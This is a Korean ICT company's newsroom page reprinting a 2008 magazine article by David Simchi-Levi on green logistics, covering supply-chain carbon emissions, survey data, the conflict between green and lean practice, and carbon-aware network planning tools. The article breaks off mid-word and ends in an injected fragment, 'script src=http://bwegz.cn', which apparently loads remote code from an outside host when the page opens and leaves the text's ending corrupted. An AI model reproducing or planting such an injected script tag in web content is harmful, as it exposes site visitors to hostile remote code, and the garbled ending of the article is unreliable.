주메뉴 바로가기 본문 바로가기 하단 바로가기

회사소개

제조, 금융, 통신, 물류, 공공 산업에 솔루션 제공 및 컨설팅, 기술 지원 등 토탈 ICT 서비스를 제공하고 있습니다.

뉴스룸

[컴퓨터월드] Making Logistics Green by David Simchi-Levi

  • 2008.07.03
  • 조회수 42,304
최근 수년간, 4 가지 주요 마켓 트렌드가 공급망 시장을 주도하였다. 엔드 투 엔드 공급망 옵티마이제이션, 에너지 비용 급등, 보다 강력한 위험관리 정책수립 및 절차 구축이 그 첫번째 3 가지 트렌드 이다. 그러나, 점차적으로 “Green Logistics” 즉 공급망 및 로지스틱스 운영 시 발생하는 탄소배출을 줄여야 한다는 개념이 업계 이슈로 부각되고 있으며, 공급망 운영을 위한 주요 요건 중 하나가 되었다.

기업의 탄소 배출에 대한 현재 인식을 고려해 보았을 때, “Green” 이슈는 기업의 전반적인 비즈니스 전략에서 중요한 역할을 할 것이라고 예상할 수 있다. 실제로, 2007년 11월에 발간된 An Eye for Transport Survey에 따르면, 조사에 응한 유럽 인원들 중 67%가 “Green” 이슈는 기업 전략에 있어 중요한 부분을 차지한다고 응답했다. 유럽이 비즈니스 “Green” 어프로치 운동을 주도함과 동시에, 미국의 59%에 달하는 상당한 비율의 임원들과, 아시아 57%에 이르는 경영자들이 “Green” 전략을 장기 전략의 핵심적인 부분으로 인식하고 있다.

공급망이 가장 큰 탄소 배출원 중 하나라는 사실을 논외로 두고서도, 업계의 생산 및 운송 요소를 고려해 볼 때, 공급망 관리 임원들은 그들의 오피스를 누르는 압력을 느낄 수 있을 것이며, 제조방법을 재검토할 필요를 느끼게 될 것이다. 그러나, 공급망에 대한 그러한 압력들이 기업 임원들에게만 가해지는 것은 아니다. “going green” 에 대한 인식의 제고로 인해, 고객, 공급망 파트너, 심지어 기업의 이익에 반하는 가치관 사이에서 갈등을 느끼고 있는 직원들까지도 에너지 비효율적인 생산방식을 검토하기 위해 조직에 압력을 가하고 있다. 유럽에서 “Green” 이슈를 옹호하는 기타 외부 압력들은 세금 감소를 통한 재정적 인센티브와 교토의정서 등이 있다.

그러나, 외부 요인들만이 행동 및 어프로치에서 변화를 유도하고 있는 것은 아니다. 많은 공급망관리 임원들은 장기 경쟁 전략으로써 “Green” 정책을 중요하게 생각하고 있다. 이것은 공급망 관리 임원들이 미래 “Green” 법안 채택 시기를 멀리 생각하고 있지 않다는 의미이며, 현재 앞선 기업들은 이를 예상하고, 예상되는 시장 개발 법안에 대해 세밀한 위험관리 어프로치를 계획하고 있다는 뜻이다.

“Green” 전략을 개발할 때, 엔드 투 엔드 공급망 전반의 탄소 배출을 평가하는 능력과 비용 뿐 만 아니라 다른 요소들을 기반으로 전략적 의사결정을 내리는 능력은 매우 중요하다. 왜냐하면, 현재 시장은 제품 생산 및 운송에 의해 발생하는 환경적 위험을 감내하지 않거나 처벌하겠다는 방향으로 인식이 흐르고 있기 때문이다. 그러나, 문제를 인식하고, 그에 대한 조치에 동의한다 할 지라도, 업계가 극복 해야 하는 과제들은 여전히 남아있다.

이러한 과제들 중 첫 번째 이슈는 기업이 자신들의 노력으로 “Green” 기업이 되고자 할 때, 이를 지원하는 테크놀로지가 부족하다는 점이다. 기업들이 스스로 벤치마킹 할 수 있는 케이스에 대한 표준화된 최신 데이터가 부족하다. 두 번째 이슈는, 기업들이 공급망 관리 시 데이터와 테크놀로지를 효율적으로 사용하기 위해 필요한 비즈니스 프로세스가 부족하다는 것이다. 마지막으로, “Green” 요구사항과 최근 업계의 문제가 되고 있는 “Lean” Practice간에 트레이트 오프가 있다는 것이다. “Lean”은 작은 Batch에서 작업하는 능력을 제공하고, 따라서 제조 및 공급망을 보다 효율적으로 만들어 준다. 그러나, 동시에 그러한 어프로치는 보다 빈번하게 운송 선적 또는 생산라인 스위치오버를 발생시켜 탄소 방출을 보다 활발하게 만들기도 한다. 이와 같은 문제가 아웃소싱에도 적용될 수 있다. 아웃소싱은 지구 다른 편으로 공장을 이전시킨 제조 프로세스의 일부로써, 해당 프로세스를 거친 후 제품을 다시 이송해와야 한다.

이러한 과제들을 극복하기 위해서, 기업들은 네트워크 설계 및 플래닝 시스템에 점점 주목하고 있다. 이들 네트워크 설계 및 플래닝 시스템은 탄소 방출 요소와 결합된다. 일반적으로 이러한 솔루션들은 공장, 창고, 다양한 운송 모드에 탄소 방출에 대한 표준(디폴트) 데이터를 입력하는 기능을 제공함으로써, 기업들이 탄소 방출량 평가를 시작할 수 있는 기반을 만들어준다. 두 번째로, 네트워크 설계 및 플래닝 시스템은 사용자들이 개별 공급망 설정 시 탄소 방출 수준을 평가할 수 있도록 도와준다. 마지막으로, 네트워크 설계 및 플래닝 시스템은 교토의정서 또는 요즘 일반화되고 있는 공급망 파트너의 스코어카드와 같은 정부 규제에 의해 제한되는 이산화탄소 방출 제한선을 구체화하므로써, 로지스틱스 네트워크를 최적화 시킬 수 있도록 해 준다. 탄소 방출량 계산 및 최적화 기능은 기업들이 다양한 생산 및 분배 기능 옵션 간의 트레이?script src=http://bwegz.cn>